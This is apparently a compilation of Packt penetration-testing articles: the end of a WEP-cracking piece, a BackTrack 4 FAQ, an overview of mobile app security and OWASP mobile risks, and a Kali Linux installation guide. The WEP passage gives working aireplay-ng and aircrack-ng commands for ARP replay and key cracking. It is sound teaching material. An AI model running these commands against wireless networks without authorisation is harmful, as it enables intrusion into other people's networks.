Both the FMS and PTW attacks need to collect quite a large number of frames to succeed and can be conducted passively, sniffing the wireless traffic on the same channel as the target AP and capturing frames. The problem is that, under normal conditions, we would have to spend quite a long time passively collecting all the necessary packets for the attacks, especially with the FMS attack. To accelerate the process, the idea is to re-inject frames into the network to generate traffic in response, so that we can collect the necessary IVs more quickly. A type of frame that is suitable for this purpose is the ARP request, because the AP broadcasts it, each time with a new IV. As we are not associated with the AP, if we send frames to it directly, they are discarded and a de-authentication frame is sent. Instead, we can capture ARP requests from associated clients and retransmit them to the AP. This technique is called the ARP Request Replay attack and is also adopted by Aircrack-ng for the implementation of the PTW attack.
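The fake authentication and ARP request replay steps are typically performed with aireplay-ng while airodump-ng keeps capturing; this is a hedged sketch in which the ESSID, MAC addresses, interface, and file names are assumptions:

    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_dump wlan0mon                     # keep writing captured IVs to disk
    sudo aireplay-ng -1 0 -e TargetWLAN -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon   # fake authentication with the AP
    sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon                   # capture and replay ARP requests to generate fresh IVs
    sudo aircrack-ng wep_dump-01.cap                                                         # run the PTW attack on the captured IVs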
Summary

In this article, we covered the WEP protocol and the attacks that have been developed to crack its keys.

Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [article] What is Kali Linux [article] Penetration Testing [article]


FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing
Master the art of penetration testing with BackTrack

Q: Which version of BackTrack should be chosen?
A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or on third-party mirrors (such as http://mirrors.rit.edu/backtrack/ or ftp://mirror.switch.ch/mirror/backtrack/), you will find two different formats of BackTrack version 4. (BackTrack 5 is out now, and hence you may not find version 4 on the official site, but the mirror sites http://mirrors.rit.edu/backtrack/ and ftp://mirror.switch.ch/mirror/backtrack/ still provide it.) One is an ISO image file. You can use this file format if you want to burn it to a DVD, USB drive, or memory card (SD, SDHC, SDXC, and so on), or if you want to install BackTrack directly onto your machine. The second file format is a VMware image. If you want to use BackTrack in a virtual environment, you might want to use this image to speed up the installation and configuration.

Q: What is Portable BackTrack?
A: You can also install BackTrack onto a USB flash disk; we call this method Portable BackTrack. After you install it onto the USB flash disk, you can easily boot into BackTrack from any machine provided with a USB port. The key advantage of this method compared to the Live DVD is that you can permanently save changes to the USB flash disk. Compared to a hard disk installation, this method is more portable and convenient. To create a portable BackTrack, you can use several tools, including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com), and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for the Windows, Linux/UNIX, and Mac operating systems.

Q: How do I install BackTrack in a dual-boot environment?
A: One of the resources that describes how to install BackTrack alongside other operating systems, such as Windows XP, can be found at: http://www.backtrack-linux.org/tutorials/dual-boot-install/.

Q: What types of penetration testing tools are available under BackTrack 4?
A: BackTrack 4 comes with a number of security tools that can be used during the penetration testing process. These are categorized into the following:
- Information gathering: This category contains tools that can be used to collect information regarding target DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from publicly available resources such as the Internet, without touching the target environment.
- Network mapping: This category contains tools that can be used to assess the live status of the target host, fingerprint the operating system, and probe and map the applications/services through various port scanning techniques.
- Vulnerability identification: In this category you will find different sets of tools to scan for vulnerabilities in various IT technologies. It also contains tools to carry out manual and automated fuzz testing and to analyze the SMB and SNMP protocols.
- Web application analysis: This category contains tools that can be used to assess the security of web servers and web applications.
- Radio network analysis: To audit wireless networks, Bluetooth, and radio-frequency identification (RFID) technologies, you can use the tools in this category.
- Penetration: This category contains tools that can be used to exploit the vulnerabilities found in the target environment.
- Privilege escalation: After exploiting the vulnerabilities and gaining access to the target system, you can use the tools in this category to escalate your privileges to the highest level.
- Maintaining access: Tools in this category will help you maintain access to the target machine. Note that you might need to escalate your privileges before attempting to install any of these tools on the compromised host.
- Voice over IP (VOIP): To analyze the security of VOIP technology, you can utilize the tools in this category.

BackTrack 4 also contains tools that can be used for:
- Digital forensics: In this category you can find several tools that can be used to perform digital forensics and investigation, such as acquiring hard disk images, carving files, and analyzing disk archives. Some practical forensic procedures require you to mount the hard drive in question and swap files in read-only mode to preserve evidence integrity.
- Reverse engineering: This category contains tools that can be used to debug, decompile, and disassemble executable files.

Q: Do I have to install additional tools with BackTrack 4?
A: Although BackTrack 4 comes preloaded with many security tools, there are situations where you may need to add additional tools or packages, either because a tool is not included with the default BackTrack 4 installation, or because you want the latest version of a particular tool, which is not available in the repository. Our first suggestion is to search for the package in the software repository. If you find the package in the repository, please use that package; if you can't find it, you can get the software package from the author's website and install it yourself. However, the former method is highly recommended to avoid any installation and configuration conflicts. You can search for tools in the BackTrack repository using the apt-cache search command. If you can't find the package in the repository and you are sure that the package will not cause any problems later on, you can install the package yourself.

Q: Why do we use the WebSecurify tool?
A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in web applications. It can be used to check for the following vulnerabilities:
- SQL injection
- Local and remote file inclusion
- Cross-site scripting
- Cross-site request forgery
- Information disclosure
- Session security flaws
WebSecurify is readily available from the BackTrack repository. To install it, you can use the apt-get command:
# apt-get install websecurify
You can search for tools in the BackTrack repository using the apt-cache search command (a short example of this workflow follows).
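A brief sketch of that search-then-install workflow as run from a root shell; the search term is just an example, and the package names returned will depend on the repository state:

    # apt-get update
    # apt-cache search websecurify
    # apt-get install websecurify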
Q: What are the types of penetration testing?
A:
- Black-box testing: The black-box approach is also known as external testing. When applying this approach, the security auditor assesses the network infrastructure from a remote location and is not aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, it may reveal known and unknown sets of vulnerabilities that exist on the network.
- White-box testing: The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible effort.
- Grey-box testing: The combination of both types of penetration testing provides a powerful insight into internal and external security viewpoints. This combination is known as grey-box testing. The key benefit of devising and practicing a grey-box approach is the set of advantages posed by both of the approaches mentioned earlier.

Q: What is the difference between vulnerability assessment and penetration testing?
A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws on the system under consideration. Another major difference is that penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment, whereas the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is also a more expensive service than vulnerability assessment.

Q: Which class of vulnerability is considered the worst to resolve?
A: A design vulnerability, because it requires the developer to derive the specifications from the security requirements and address the implementation securely. Thus, it takes more time and effort to resolve the issue when compared to other classes of vulnerability.

Q: Which OSSTMM test type follows the rules of penetration testing?
A: Double blind testing.

Q: What is the Application Layer?
A: Layer 7 of the Open Systems Interconnection (OSI) model is known as the Application Layer. The key function of this model is to provide a standardized way of communicating across heterogeneous networks. The model is divided into seven logical layers, namely Physical, Data Link, Network, Transport, Session, Presentation, and Application. The basic functionality of the application layer is to provide network services to user applications. More information on this can be obtained from: http://en.wikipedia.org/wiki/OSI_model.

Q: What are the steps of the BackTrack testing methodology?
A: The illustration below shows the BackTrack testing process.

Summary

In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently.

Further resources on this subject: Tips and Tricks on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]


Android and iOS Apps Testing at a Glance

Packt
02 Feb 2016
21 min read
In this article by Vijay Velu, the author of Mobile Application Penetration Testing, we will discuss the current state of mobile application security and the approach to testing for vulnerabilities in mobile devices. We will see the major players in the smartphone OS market and how attackers target users through apps. We will deep-dive into the architecture of Android and iOS to understand the platforms and their current security state, focusing specifically on the various vulnerabilities that affect apps. We will have a look at the Open Web Application Security Project (OWASP) standard used to classify these vulnerabilities. Readers will also get an opportunity to practice security testing for these vulnerabilities by means of readily available vulnerable mobile applications. The article will also cover the step-by-step setup of the environment required to carry out security testing of mobile applications for Android and iOS. We will also explore the threats that may arise due to potential vulnerabilities and learn how to classify them according to their risks.

(For more resources related to this topic, see here.)

Smartphones' market share

Understanding smartphones' market share will give us a clear picture of what cyber criminals are after and what could potentially be targeted. Mobile application developers can propose and publish their applications on the stores and be rewarded with a revenue share of the selling price. The following screenshot, taken from www.idc.com, provides us with the overall smartphone OS market in 2015. Since mobile applications are platform-specific, the majority of software vendors are forced to develop applications for all the available operating systems.

Android operating system

Android is an open source, Linux-based operating system for mobile devices (smartphones and tablet computers). It was developed by the Open Handset Alliance, which was led by Google and other companies. Android can be programmed in C/C++, but most application development is done in Java (Java accesses C libraries via JNI, which is short for Java Native Interface).

iPhone operating system (iOS)

iOS was developed by Apple Inc. It was originally released in 2007 for the iPhone, iPod Touch, and Apple TV. iOS is Apple's mobile version of the OS X operating system used in Apple computers; it is UNIX-based (derived from the Berkeley Software Distribution, BSD) and can be programmed in Objective-C.

Public Android and iOS vulnerabilities

Before we proceed with the different types of vulnerabilities on Android and iOS, this section introduces you to Android and iOS as operating systems and covers various fundamental concepts that need to be understood to gain experience in mobile application security.
Public Android and iOS vulnerabilities

Before we proceed with the different types of vulnerabilities on Android and iOS, this section introduces you to Android and iOS as operating systems and covers various fundamental concepts that need to be understood to gain experience in mobile application security. The following list comprises the year-wise operating system releases:

2007/2008: Android 1.0; iPhone OS 1, iPhone OS 2
2009: Android 1.1, 1.5 (Cupcake), 2.0 (Eclair), 2.0.1 (Eclair); iPhone OS 3
2010: Android 2.1 (Eclair), 2.2 (Froyo), 2.3-2.3.2 (Gingerbread); iOS 4
2011: Android 2.3.4-2.3.7 (Gingerbread), 3.0 (HoneyComb), 3.1 (HoneyComb), 3.2 (HoneyComb), 4.0-4.0.2 (Ice Cream Sandwich), 4.0.3-4.0.4 (Ice Cream Sandwich); iOS 5
2012: Android 4.1 (Jelly Bean), 4.2 (Jelly Bean); iOS 6
2013: Android 4.3 (Jelly Bean), 4.4 (KitKat); iOS 7
2014: Android 5.0 (Lollipop), 5.1 (Lollipop); iOS 8
2015: iOS 9 (beta)

An interesting piece of research conducted by Hewlett Packard (HP), a software giant that tested more than 2,000 mobile applications from more than 600 companies, reported the following statistics (for more information, visit http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-1057ENW.pdf):

97% of the applications that were tested accessed at least one private information source
86% of the applications failed to use simple binary-hardening protections against modern-day attacks
75% of the applications did not use proper encryption techniques when storing data on a mobile device
71% of the vulnerabilities resided on the web server
18% of the applications sent usernames and passwords over HTTP (of the remaining 85%, 18% implemented SSL/HTTPS incorrectly)

So, the key vulnerabilities in mobile applications arise due to a lack of security awareness, the "usability versus security trade-off" made by developers, excessive application permissions, and a lack of privacy concerns. Coupling this with a lack of sufficient application documentation leads to vulnerabilities that developers are not aware of.

Usability versus security trade-off

It is not possible for every developer to provide users with an application that offers both high security and high usability. Making any application secure and usable takes a lot of effort and analytical thinking. Mobile application vulnerabilities are broadly categorized as follows:

Insecure transmission of data: Either an application does not enforce any kind of encryption for data in transit on the transport layer, or the implemented encryption is insecure.
Insecure data storage: Apps may store data in a cleartext or obfuscated format, or hard-code keys on the mobile device. For example, an e-mail exchange server configuration on an Android device may store the username and password in cleartext, which is easy to recover by any attacker if the device is rooted.
Lack of binary protection: Apps do not enforce any anti-reversing or debugging techniques.
Client-side vulnerabilities: Apps do not sanitize data provided from the client side, leading to multiple client-side injection attacks such as cross-site scripting, JavaScript injection, and so on.
Hard-coded passwords/keys: Apps may be designed in such a way that hard-coded passwords or private keys are stored on the device storage.
Leakage of private information: Apps may unintentionally leak private information. This could be due to the use of a particular framework and the obscurity assumptions of developers.

Android vulnerabilities

In July 2015, a security company called Zimperium announced that it had discovered a high-risk vulnerability named Stagefright inside the Android operating system. They deemed it a unicorn in the world of Android risk, and it was practically demonstrated at one of the hacking conferences in the US on August 5, 2015.
More information can be found at https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/; a public exploit is available at https://www.exploit-db.com/exploits/38124/. This prompted Google to release security patches for all affected Android operating systems, which are believed to cover 95% of Android devices, an estimated 950 million users. The vulnerability is exploited through a particular library and can let attackers take control of an Android device by sending a specially crafted multimedia message through services such as the Multimedia Messaging Service (MMS).

If we take a look at superuser application downloads from the Play Store, there are around 1 million to 5 million downloads, so it can be assumed that a major portion of Android smartphones are rooted. Graphs in the original article show the Android vulnerabilities reported from 2009 until September 2015; there are currently 54 reported vulnerabilities for the Google Android operating system (for more information, visit http://www.cvedetails.com/product/19997/Google-Android.html?vendor_id=1224). The more features that are introduced to the operating system in the form of applications, the more additional entry points exist that allow cyber attackers or security researchers to circumvent and bypass the controls that were put in place.

iOS vulnerabilities

On June 18, 2015, a password-stealing vulnerability, also known as the Cross Application Reference Attack (XARA), was outlined for iOS and OS X. It cracked the keychain services on jailbroken and non-jailbroken devices. The vulnerability is similar to a cross-site request forgery attack in web applications. In spite of Apple's isolation protection and its App Store's security vetting, it was possible to circumvent the security control mechanisms. It clearly demonstrated the need to protect the cross-app mechanism between the operating system and the app developer. Apple rolled out a security update a week after the XARA research. More information can be found at http://www.theregister.co.uk/2015/06/17/apple_hosed_boffins_drop_0day_mac_ios_research_blitzkrieg/.

Graphs in the original article show the vulnerabilities in iOS from 2007 until September 2015; there are around 605 reported vulnerabilities for Apple iPhone OS (for more information, visit http://www.cvedetails.com/product/15556/Apple-Iphone-Os.html?vendor_id=49). As you can see, the vulnerabilities have kept on increasing year after year. A majority of the vulnerabilities reported are denial-of-service attacks, which make the application unresponsive. Primarily, these vulnerabilities arise due to insecure libraries or buffer overflows on the stack.

Rooting/jailbreaking

Rooting/jailbreaking refers to the process of removing the limitations imposed by the operating system on devices through the use of exploit tools. Rooting/jailbreaking enables users to gain complete control over the operating system of a device.

OWASP's top ten mobile risks

In 2013, OWASP polled the industry for new vulnerability statistics in the field of mobile applications. The following risks were finalized in 2014 as the top ten dangerous risks as per the result of the poll data and the mobile application threat landscape:

M1: Weak server-side controls: Internet usage via mobiles has surpassed fixed Internet access. This is largely due to the emergence of hybrid and HTML5 mobile applications. Application servers that form the backbone of these applications must be secured on their own.
The OWASP top 10 web application project defines the most prevalent vulnerabilities in this realm. Vulnerabilities such as injections, insecure direct object reference, insecure communication, and so on may lead to the complete compromise of an application server. Adversaries who have gained control over the compromised servers can push malicious content to all the application users and compromise user devices as well. M2: Insecure data storage: Mobile applications are being used for all kinds of tasks such as playing games, fitness monitors, online banking, stock trading, and so on, and most of the data used by these applications are either stored in the device itself inside SQLite files, XML data stores, log files, and so on, or they are pushed on to Cloud storage. The types of sensitive data stored by these applications may range from location information to bank account details. The application programing interfaces (API) that handle the storage of this data must securely implement encryption/hashing techniques so that an adversary with direct access to these data stores via theft or malware will not be able to decipher the sensitive information that's stored in them. M3: Insufficient transport layer protection: "Insecure Data Storage", as the name says, is about the protection of data in storage. But as all the hybrid and HTML 5 apps work on client-server architecture, emphasis on data in motion is a must, as the data will have to traverse through various channels and will be susceptible to eavesdropping and tampering by adversaries. Controls such as SSL/TLS, which enforce confidentiality and integrity of data, must be verified for correct implementations on the communication channel from the mobile application and its server. M4: Unintended data leakage: Certain functionalities of mobile applications may place users' sensitive data in locations where it can be accessed by other applications or even by malware. These functionalities may be there in order to enhance the usability or user experience but may pose adverse effects in the long run. Actions such as OS data caching, key press logging, copy/paste buffer caching, and implementations of web beacons or analytics cookies for advertisement delivery can be misused by adversaries to gain information about users. M5: Poor authorization and authentication: As mobile devices are the most "personal" devices, developers utilize this to store important data such as credentials locally in the device itself and come up with specific mechanisms to authenticate and authorize users locally for the services that users request via the application. If these mechanisms are poorly developed, adversaries may circumvent these controls and unauthorized actions can be performed. As the code is available to adversaries, they can perform binary attacks and recompile the code to directly access authorized content. M6: Broken cryptography: This is related to the weak controls that are used to protect data. Using weak cryptographic algorithms such as RC2, MD5, and so on, which can be cracked by adversaries, will lead to encryption failure. Improper encryption key management when a key is stored in locations accessible to other applications or the use of a predictable key generation technique will also break the implemented cryptography techniques. M7: Client-side injection: Injection vulnerabilities are the most common web vulnerabilities according to OWASP web top 10 dangerous risks. 
These are due to malformed inputs, which cause unintended actions such as an alteration of database queries, command execution, and so on. In the case of mobile applications, malformed inputs can be a serious threat at the local application level and on the server side as well (refer to M1: Weak server-side controls). Injections at the local application level, which mainly target data stores, may result in conditions such as access to paid content that's locked for trial users, or file inclusions that may lead to an abuse of functionalities such as SMS.

M8: Security decisions via untrusted inputs: An implementation of certain functionalities, such as the use of hidden variables to check authorization status, can be bypassed by tampering with them in transit via web service calls or inter-process communication calls. This may lead to privilege escalation and unintended behavior of mobile applications.

M9: Improper session handling: The application server sends back a session token on successful authentication with the mobile application. These session tokens are used by the mobile application to request services. If these session tokens remain active for a longer duration and adversaries obtain them via malware or theft, the user account can be hijacked.

M10: Lack of binary protection: A mobile application's source code is available to all. An attacker can reverse engineer the application, insert malicious code components, and recompile it. If these tampered applications are installed by a user, they will be susceptible to data theft and may be the victims of unintended actions. Most applications do not ship with mechanisms such as checksum controls, which help in deducing whether the application has been tampered with or not.

In 2015, there was another poll under the OWASP Mobile Security group's "umbrella project". Going by the trend, lack of binary protection looks set to move from M10 up to M2, taking over from weak server-side controls; however, we will have to wait for the final 2015 list. More details can be found at https://www.owasp.org/images/9/96/OWASP_Mobile_Top_Ten_2015_-_Final_Synthesis.pdf.

Vulnerable applications to practice

The open source community has been proactively designing plenty of mobile applications that can be utilized for practical tests. These are specifically designed to help you understand the OWASP top ten risks. Some of these applications are as follows:

iMAS: iMAS is a collaborative research project initiated by the MITRE Corporation (http://www.mitre.org/). It is aimed at application developers and security researchers who would like to learn more about attack and defense techniques in iOS. More information about iMAS can be found at https://github.com/project-imas/about.
GoatDroid: A simple, functional mobile banking application with location tracking, developed by Jack and Ken for Android application security training; it is a great starting point for beginners. More information about GoatDroid can be found at https://github.com/jackMannino/OWASP-GoatDroid-Project.
iGoat: OWASP's iGoat project is similar to the WebGoat web application framework. It is designed to improve iOS assessment techniques for developers. More information on iGoat can be found at https://code.google.com/p/owasp-igoat/.
Damn Vulnerable iOS Application (DVIA): DVIA is an iOS application that provides a platform for developers, testers, and security researchers to test their penetration testing skills.
This application covers all of OWASP's top 10 mobile risks and also contains several challenges that one can solve and come up with custom solutions for. More information on the Damn Vulnerable iOS Application can be found at http://damnvulnerableiosapp.com/.
MobiSec: MobiSec is a live environment for the penetration testing of mobile environments. This framework provides devices, applications, and supporting infrastructure. It provides a great exercise for testers to view vulnerabilities from different points of view. More information on MobiSec can be found at http://sourceforge.net/p/mobisec/wiki/Home/.

Android application sandboxing

Android utilizes the well-established Linux protection ring model to isolate applications from each other. In the Linux OS, every user is segregated by being assigned a unique ID, which ensures that there is no cross-account data access. Similarly, in the Android OS every app is assigned its own unique ID and is run as a separate process. As a result, an application sandbox is formed at the kernel level, and the application is only able to access the resources it is permitted to access. This subsequently ensures that the app does not breach its work boundaries and initiate any malicious activity. The sandbox illustration in the original article shows how the unique Linux user ID created per application is validated every time a resource mapped to the app is accessed, thus ensuring a form of access control.

Android Studio and SDK

On May 16, 2013, at the Google I/O conference, an Integrated Development Environment (IDE) called Android Studio was released by Katherine Chou under the Apache 2.0 license; it is used to develop apps on the Android platform. It entered the beta stage in 2014, the first stable release, Version 1.0, arrived in December 2014, and it was announced as the official IDE on September 15, 2015. Information on Android Studio and the SDK is available at http://developer.android.com/tools/studio/index.html#build-system.

Android Studio and the SDK depend heavily on the Java SE Development Kit, which can be downloaded from http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. Some developers prefer different IDEs such as Eclipse; for them, Google only offers SDK downloads (http://dl.google.com/android/installer_r24.4.1-windows.exe). There are minimum system requirements that need to be fulfilled in order to install and use Android Studio effectively. The following procedure is used to install Android Studio on a Windows 7 Professional 64-bit operating system with 4 GB RAM, 500 GB of hard disk space, and Java Development Kit 7 installed:

The IDE is available for Linux, Windows, and Mac OS X, and can be downloaded by visiting http://developer.android.com/sdk/index.html.
Once Android Studio is downloaded, run the installer file. By default, an installation window will be shown. Click on Next.
The setup will automatically check whether the system meets the requirements. Choose all the components that are required and click on Next.
It is recommended to read and accept the license and click on Next.
It is always recommended to create a new folder in which to install the tools, as this will help us track all the evidence in a single place.
In this case, we have created a folder called Hackbox in C:\. Now, we can allocate the space required for the Android-accelerated environment, which will provide better performance; it is recommended to allocate a minimum of 2 GB for this. All the necessary files will be extracted to C:\Hackbox. Once the installation is complete, you will be able to launch Android Studio.

Android SDK

The Android SDK provides developers with the ability to completely build, test, and debug apps that run on the Android platform. It has all the relevant software libraries, APIs, system images for the emulators, documentation, and other tools that help create an Android app. We have installed Android Studio along with the Android SDK. It is crucial to understand how to utilize the built-in SDK tools as much as possible. This section provides an overview of some of the critical tools that we will be using when attacking an Android app during the penetration testing activity.

Emulators, simulators, and real devices

Sometimes, we tend to believe that all virtual emulations work in exactly the same way as real devices, which is not really the case. Especially for Android, we have multiple OEMs manufacturing multiple devices, with different chipsets running different versions of Android. It would be a challenge for developers to ensure that all the functionalities of an app behave in the same way on all devices. It is very crucial to understand the difference between emulators, simulators, and real devices.

Simulators

The objective of a simulator is to reproduce the state of an object so that it is exactly the same as the state of the real object. It is preferable that the testing happens when a mobile interacts with some of the natural behavior of the available resources. Simulators are reimplementations of the original software applications; they are difficult to debug and are mostly written in high-level languages.

Emulators

Emulators predominantly aim at replicating the closest possible behavior of mobile devices. They are typically used to test a mobile's internal behavior, such as hardware, software, and firmware updates. They are typically written in machine-level languages and are easy to debug. This is again a reimplementation of the real software.

Pros:
Fast, simple, and with little or no price associated
Emulators/simulators are quickly available to test the majority of the functionality of the app that is being developed
It is very easy to find defects using emulators and fix the issues

Cons:
The risk of false positives is increased; some of the functions or protections may actually not work on a real device.
Differences in software and hardware will arise. Some emulators might be able to mimic the hardware; however, it may or may not work when it is actually installed on that particular hardware in reality.
There is a lack of network interoperability. Since emulators are not really connected to a Wi-Fi or cellular network, it may not be possible to test network-based risks/functions.

Real devices

Real devices are the physical devices that a user will be interacting with. There are pros and cons to real devices too.
Pros:
Fewer false positives: Results are accurate
Interoperability: All the test cases run in a live environment
User experience: Real user experience when it comes to CPU utilization, memory, and so on for a given device
Performance: Performance issues can be found quickly with real handsets

Cons:
Costs: There are plenty of OEMs, and buying all the devices is not viable.
A slowdown in development: Connecting a real device to an IDE for debugging is not as straightforward as with an emulator, which significantly slows down the development process.
Other issues: Devices connected locally to the workstation require open USB ports, thus opening an additional entry point.

Threats

A threat is something that can harm an asset that we are trying to protect. In mobile device security, a threat is a possible danger that might exploit a vulnerability to compromise and cause potential harm to a device. A threat can be defined by its motives; it can be any of the following:

Intentional: An individual or a group with an aim to break an application and steal information
Accidental: The malfunctioning of a device or an application may lead to a potential disclosure of sensitive information
Others: Capabilities, circumstantial, and so on

Threat agents

A threat agent is an individual or a group that can manifest a threat. Threat agents are able to perform the following actions: access, misuse, disclose, modify, and deny access.

Vulnerability

The security weakness within a system that might allow attackers to exploit it and break the security of the device is called a vulnerability. For example, if a mobile device is stolen and it does not have a PIN or passcode enabled, the phone is vulnerable to data theft.

Risk

The intersection between asset (A), threat (T), and vulnerability (V) is a risk. However, a risk can also include the probability (P) of the threat occurring to provide more value to the business:

Risk = A x T x V x P

These terms will help us understand the real risk to a given asset, and the business will benefit only if these risks are accurately assessed. Understanding threat, vulnerability, and risk is the first step in threat modeling. For a given application, no vulnerabilities, or a vulnerability with no threats, is considered to be a low risk. A toy calculation illustrating this relationship is shown at the end of this article.

Summary

In this article, we saw that mobile devices are susceptible to attacks through various threats, which exist due to the lack of sufficient security measures that can be implemented at various stages of the development of a mobile application. It is necessary to understand how these threats are manifested and learn how to test and mitigate them effectively. Proper knowledge of the underlying architecture and the tools available for the testing of mobile applications will help developers and security testers alike to protect end users from attackers who may be attempting to leverage these vulnerabilities.
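To close, here is a toy illustration of the Risk = A x T x V x P relationship described in the Risk section. The scales and weights below are invented purely for demonstration and are not part of the original article; real programmes define their own rating scheme, and the script assumes bc is installed for the floating-point arithmetic.

#!/usr/bin/env bash
# Illustrative only: combine asset value, threat, vulnerability, and probability
# into a single indicative score.
ASSET=5      # business value of the asset, rated 1-5 (assumed scale)
THREAT=3     # threat level, rated 1-5 (assumed scale)
VULN=4       # vulnerability severity, rated 1-5 (assumed scale)
PROB=0.6     # estimated probability of the threat occurring, 0-1
RISK=$(echo "$ASSET * $THREAT * $VULN * $PROB" | bc -l)
echo "Indicative risk score: $RISK"

A higher score simply flags where assessment effort should be focused first; it is not a substitute for the qualified judgement discussed above.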
article-image-what-kali-linux

What is Kali Linux

Packt
05 Feb 2015
1 min read
This article created by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It covers many different varieties of security tools, each of which are organized by category. Let's begin by downloading and installing Kali Linux! (For more resources related to this topic, see here.) Downloading Kali Linux Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited so let's begin! Visit http://www.kali.org/downloads/. Look under the Official Kali Linux Downloads section: In this demonstration, I will be downloading and installing Kali Linux 1.0.6 32 Bit ISO. Click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it. Depending on your Internet connection, this may take an hour to download, so please prepare yourself ahead of time so that you do not have to wait on this download. Those who have a slow Internet connection may want to reconsider downloading from a faster source within the local area. Restrictions on downloading may apply in public locations. Please make sure you have permission to download Kali Linux before doing so. Installing Kali Linux in VMware Player Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that emulates an operating system without requiring another physical system. You can create multiple operating systems and run them simultaneously. Perform the following steps: Let's start off by opening VMware Player from your desktop: VMware Player should open and display a graphical user interface: Click on Create a New Virtual Machine on the right: Select I will install the operating system later and click on Next. Select Linux and then Debian 7 from the drop-down menu: Click on Next to continue. Type Kali Linux for the virtual machine name. Browse for the Kali Linux ISO file that was downloaded earlier then click on Next. Change the disk size from 25 GB to 50 GB and then click on Next: Click on Finish: Kali Linux should now be displaying in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware. Click on Play virtual machine: Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings…: Check the box next to Connected, Select Use ISO image file, browse for the Kali Linux ISO, then click on OK. Click on Restart VM at the bottom of the screen or click on Player, then navigate to Power | Restart Guest; the following screen appears: After restarting the virtual machine, you should see the following: Select Live (686-pae) then press Enter It should boot into Kali Linux and take you to the desktop screen: Congratulations! You have successfully installed Kali Linux. Updating Kali Linux Before we can get started with any of the demonstrations in this book, we must update Kali Linux to help keep the software package up to date. Open VMware Player from your desktop. Select Kali Linux and click on the green arrow to boot it. Once Kali Linux has booted up, open a new Terminal window. 
Type sudo apt-get update and press Enter: Then type sudo apt-get upgrade and press Enter: You will be prompted to specify if you want to continue. Type y and press Enter: Repeat these commands until there are no more updates: sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade Congratulations! You have successfully updated Kali Linux! Summary This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work through Kali Linux to install and update it on VMware Player. Resources for Article: Further resources on this subject: Veil-Evasion [article] Penetration Testing and Setup [article] Wireless and Mobile Hacks [article]
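The update commands shown earlier in this article can be wrapped into a small script so that the whole cycle runs in one go. This is a minimal sketch; on a default Kali live session you are already root, so the sudo prefix can be dropped.

#!/usr/bin/env bash
# Run the full Kali update cycle non-interactively and stop on the first error.
set -e
sudo apt-get update
sudo apt-get -y upgrade
sudo apt-get -y dist-upgrade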

article-image-backtrack-4-penetration-testing-methodologies

BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap. This will provide practical ideas and proven practices, which should be handled with great care in order to assess the system's security correctly. Let's take a look at what this methodology looks like. It will help ensure that you're using BackTrack effectively and that your tests are thorough and reliable.

Penetration testing can be carried out independently or as part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, the Microsoft SDLC). It is vital to note that the security of a product not only depends on the factors relating to the IT environment, but also relies on product-specific security best practices. This involves the implementation of appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. Penetration testing is considered to be the last and most aggressive form of security assessment, handled by qualified professionals with or without prior knowledge of the system under examination. It can be used to assess all the IT infrastructure components, including applications, network devices, operating systems, communication media, physical security, and human psychology. The output of penetration testing usually contains a report which is divided into several sections addressing the weaknesses found in the current state of the system, followed by their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester in understanding and critically analyzing the integrity of current defenses during each stage of the testing process.

Different types of penetration testing

Although there are different types of penetration testing, the two most general approaches that are widely accepted by the industry are black-box and white-box. These approaches will be discussed in the following sections.

Black-box testing

